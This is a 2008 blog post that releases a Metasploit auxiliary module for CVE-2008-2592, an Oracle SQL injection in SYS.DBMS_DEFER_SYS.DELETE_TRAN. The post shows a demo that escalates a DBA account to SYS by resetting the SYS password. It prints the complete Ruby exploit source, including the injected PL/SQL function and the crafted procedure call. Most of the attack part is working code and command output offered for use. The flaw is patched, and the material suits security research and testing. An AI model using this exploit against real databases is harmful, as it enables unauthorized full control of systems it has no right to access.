In some of the past posts I covered finding a user default user account or account with an easy to guess username/password for Oracle and taking that user to DBA via SQL Injection in Oracle packages.
I've been neglecting the blog a bit porting some of the public SQLI for Oracle into metasploit auxiliary modules. Not sure when its going to be put into the trunk but it will be at some point, I think MC is working on the mixin to reduce the dependence on the Oracle instantclient.
Anyway, so it being the week of Christmas or whatever you celebrate I thought I'd put out a module that has a vulnerability out but no exploit code.
So...coverage for: http://www.appsecinc.com/resources/alerts/oracle/2008-05.shtml
Details: The PL/SQL package DBMS_DEFER_SYS owned by SYS has an instance of SQL Injection in the DELETE_TRAN procedure. A malicious user can call the vulnerable procedure of this package with specially crafted parameters and execute SQL statements with the elevated privileges of SYS user.
Impact: Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privileges.
Let's see it in action. Assuming we got DBA from one of the other SQLI modules.
SQL> select * from user_role_privs;
USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- HACKER DBA NO YES NO
SQL> alter user SYS identified by 0raclefun; alter user SYS identified by 0raclefun * ERROR at line 1: ORA-01031: insufficient privileges
msf auxiliary(dbms_defer_sys) > set SQL "alter user sys identified by 0raclefun" SQL => alter user sys identified by 0raclefun msf auxiliary(dbms_defer_sys) > run
[*] Sending function.. [*] Done... [*] Calling SYS.DBMS_DEFER_SYS.DELETE_TRAN... [*] Done... [*] Auxiliary module execution completed
cg@WPAD:~/oracle$ sqlplus sys/0raclefun@172.16.102.128/oracle as sysdba
SQL*Plus: Release 11.1.0.6.0 - Production on Fri Dec 19 17:43:57 2008
Copyright (c) 1982, 2007, Oracle. All rights reserved.
Connected to: Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Production With the Partitioning, OLAP and Data Mining options
SQL>
select user from dual;
USER ------------------------------ SYS
SQL>
Tested on 9i and 10g release 1
codez available here: http://www.carnal0wnage.com/research/dbms_defer_sys.rb
It's definitely a work in progress, so if you have feedback, send it.
----------------------------------------code-------------------------------------------
##
# $Id: dbms_defer_sys.rb
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::ORACLE
def initialize(info = {})
super(update_info(info,
'Name' => 'SQL Injection via SYS.DBMS_DEFER_SYS',
'Description' => %q{
This module will exploits a SQL Injection vulnerability in the SYS.DBMS_DEFER_SYS package. Any Oracle database user with EXECUTE privilege on the package SYS.DBMS_DEFER_SYS can exploit this vulnerability. By default, users granted DBA have the required privilege or anyone who is granted EXECUTE on SYS.DBMS_DEFER_SYS. Exploitation of this vulnerability allows an attacker to execute SQL commands with SYS privilege Affected versions: Oracle Database Server versions 9iR1, 9iR2, 10gR1, 10gR2 and 11gR1. Fixed with Oracle Critical Patch update July 2008. See additional comments in source.
},
'Author' => 'CG |at| carnal0wnage |dot| com' ,
'License' => MSF_LICENSE,
'Version' => '$Revision:
,
'References' =>
[
[ 'CVE', '2008-2592'],
[ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-05.shtml'],
[ 'URL', 'http://seclists.org/fulldisclosure/2008/Aug/0229.html'],
],
'DisclosureDate' => 'JULY 29 2008'))
register_options(
[
OptString.new('DBA', [ false, 'DB user to elevate to DBA.', 'SCOTT']),
OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']),
], self.class)
end
#from: http://seclists.org/fulldisclosure/2008/Aug/0229.html
#The DBA role in Oracle Database is not the same as SYSDBA privilege,
#which is granted to SYS. There are many things that a user granted the
#DBA role can't do - the most important being the ability to alter SYS
#owned objects. This is true on databases where
#O7_DICTIONARY_ACCESSIBILITY=FALSE (default value).
#read the rest of the FD post for more usage ideas
def run
c = connect
p = Rex::Text.rand_text_alpha(rand(8) + 1)
query = datastore['SQL'].upcase
# fun queries
# set SQL "alter user SYS identified by my!supersecretpassword "
# connect as: sys/my!supersecretpasswordr@IP/SID as sysdba
# set SQL "GRANT DBA to user"
function = "
CREATE OR REPLACE FUNCTION #{p}
RETURN NUMBER AUTHID CURRENT_USER AS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE '#{query}';
COMMIT;
RETURN(0);
END;
"
#so far I havent figured out how to see the output of the query with this module
# The user executing this module will have to be DBA or have execute privileges on the SYS.DBMS_DEFER_SYS package (which is just DBA by default)
call = "
BEGIN
SYS.DBMS_DEFER_SYS.DELETE_TRAN ('''||'||user||'.#{p}||''','');
END;
"
print_status("Sending function..")
prepare_exec(function)
print_status("Calling SYS.DBMS_DEFER_SYS.DELETE_TRAN...")
prepare_exec(call)
c.disconnect
end
end
|